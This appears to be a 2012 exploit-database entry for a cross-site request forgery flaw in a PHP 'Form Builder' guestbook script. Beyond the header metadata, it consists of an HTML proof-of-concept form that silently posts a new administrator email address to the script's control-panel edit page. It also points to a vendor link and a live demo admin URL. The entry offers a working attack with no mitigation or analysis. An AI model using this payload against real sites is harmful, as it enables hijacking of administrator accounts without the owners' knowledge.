Form Builder CSRF Vulnerability



EKU-ID: 1767 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Form Builder CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/form-builder/21967/
# Category::  webapps
# Demo : http://phpscriptz.net/guestbook_demo/cp/login.php
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form name="frm" method="POST" action="/guestbook_demo/cp/edit.php" onsubmit="return validateForm(1);">
<input name="txtEmail" class="textarea" value="mail@mail.com" type="hidden">
<input name="submit" class="button" value="Save" type="submit">
</form>